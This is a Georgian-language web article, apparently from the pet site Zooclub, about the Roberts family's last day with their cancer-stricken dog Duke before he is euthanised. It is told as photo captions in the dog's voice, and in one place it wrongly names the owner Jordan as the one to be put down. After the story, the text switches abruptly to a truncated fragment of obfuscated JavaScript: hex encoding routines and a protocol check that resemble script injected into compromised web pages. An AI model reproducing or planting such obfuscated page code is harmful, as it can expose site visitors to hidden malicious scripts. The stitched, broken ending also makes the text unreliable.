"ამ დღეს მე მოვკვდი"
"ამ დღეს მე მოვკვდი"
რობერტსის ოჯახმა იცოდა, რომ საყვარელი ძაღლის დიუკის დაძინება მოუწევდათ. მათ არჩევანი არ ჰქონდათ - კიბო პროგრესირებდა.

თავის დროს ჯორდან რობერტსმა დიუკი გადაარჩინა. ძაღლი ცხოველების თავშესაფარში იმ ძაღლთა ჩამონათვალში შედიოდა, რომელთაც აძინებდნენ: დიდი, შავი და ასაკოვანი ძაღლი. ასეთები პრაქტიკულად არავის მიყავს სახლში. მაგრამ დიუკს საოცრად გაუმართლა - ის ჯორდანმა დაინახა.

რამოდენიმე წლის შემდეგ ძაღლს წინა მარჯვენა თათზე ოსტეოსარკომა აღმოაჩნდა. ეს ფაქტობრივად ავთვისებიანი სიმსივნეა, რომელიც ძვალში ვითარდება. თათი მოაჭრეს, მაგრამ დაავადება პროგრესირებდა და ცხოველი დიდ ტკივილს განიცდიდა.

გადაწყდა, რომ ჯორდანი 7 ივნისს უნდა
დაეძინებინათ. ამ პროცესამდე ოჯახმა გადაწყვიტა თავისი საყვარელი ბინადრისთვის
საუკეთესო გაცილება მოეწყო. მათ ფოტოგრაფ რობინ აროუტის საუკეთესო მეგობრის ბოლო დღის გადაღება სთხოვეს.
_ _ _


Zooclub
"ო, იმდენი ჰამბურგერი მივირთვი! ჩვენ ნამდვილი საღამო გვქონდა.

Zooclub
და მე ვიცინოდი.

Zooclub
ვფიქრობდი იმაზე, თუ როგორ მომენატრებოდა აქაურობა.

Zooclub
ჩვენ ბევრს ვხუმრობდით...

Zooclub
ჩვენ ვიყავით სერიოზულები.

Zooclub
ჩემი მეზობლები მოვიდნენ ჩემს სანახავად. ისინი ტყუპები არიან. როდესაც ვიღაცამ ერთ-ერთ მათგანს ჩემი ჰამბურგერი შესთავაზა მან უპასუხა: “არა, გმადლობ, არ მინდა დიუკს რამე წავართვა”.


Zooclub
კრისტენიც კი მოვიდა ჩემს სანახავად. ის ისეთი მხიარულია. კრისტენი ჩემი გრუმერი და მეგობარია.
Zooclub


Zooclub


როდესაც ჩვენ ვეტერინარს ველოდით, კრისტენმა თქვა, რომ ჩვენ სასეირნოდ წავალთ. მერე ვიღაცამ შემოგვთავაზა ქუჩის ბოლოს აკვაპარკთან ჩავსულიყავით და ყველანი იქით გავეშურეთ!

Zooclub

“შენ ხომ იცი, რომ ძალიან მომენატრები?!”


Zooclub
“შენც ძალიან მომენატრები”


Zooclub
“მე მინდა, რომ შენ ჩემს ოჯახს მიხედო.”

Zooclub
“გესმის? ეს ყველაფერია, რაც უნდა მეთხოვა”.

Zooclub
ხო, დღეს ჩვენ გვარიანად დავსველდით.

Zooclub
და ვიღიმებოდით.

Zooclub
ჩვენ მადლობელნი ვიყავით ამ დღისთვის.

Zooclub
დღეს ჩვენ დავარღვიეთ წესები.

Zooclub
ვუსმენდი სადღაც ახლოს, როგორ თამაშობდნენ ბავშვები და ვფიქრობდი ჩემს მეგობრებზე, რომლებიც სახლში დარჩნენ. მომწონდა მათი დაცვა.

Zooclub
სრულიად მშვიდად ვიყავი.

Zooclub
არ ვგრძნობდი ტკივილს, თუმცა, სიმსივნე დიდი იყო.

Zooclub
დღეს მხოლოდ სიყვარულს ვგრძნობდი.

Zooclub
ვემშვიდობებოდი ჩემს უსაყვარლეს მეგობარ კირას. ის თითქოს ხედავდა, როგორ დავფრინავდი მათ თავზე წამებით ადრე, ვიდრე ექიმმა თქვა, რომ დრო მოვიდა. აღელვებული და ბედნიერი ვიყავი.


Zooclub
არ მითქვამს “მშვიდობით”. მე ვთქვი: “ნახვამდის”.

Zooclub
ღმერთო, მე ბედნიერი ძაღლი ვიყავი. ჩვენ ერთად ცოტა დრო გავატარეთ, მაგრამ ეს დრო დაუვიწყარი იყო. თქვენ მეორე შანსი მომეცით და ერთად გავიარეთ ეს ყველაფერი.

მუდამ ვიზრუნებ თქვენზე.

მარად თქვენი
დიუკი”


// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e